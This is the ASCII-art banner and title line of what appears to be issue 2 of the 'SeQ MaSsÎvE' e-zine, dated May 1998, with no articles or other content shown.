                 ░ ░  ░    ░░▒ ▒ ░ ▒  ▒ ░ ░ ░░   ░ ▒░  ░ ░  ░
                 ░       ░ ░ ░ ░ ░  ▒ ░    ░   ░ ░     ░
                 ░  ░      ░ ░      ░            ░     ░  ░
                             ░
                       SeQ MaSsÎvE® E-Zine N#2 Maio/1998 


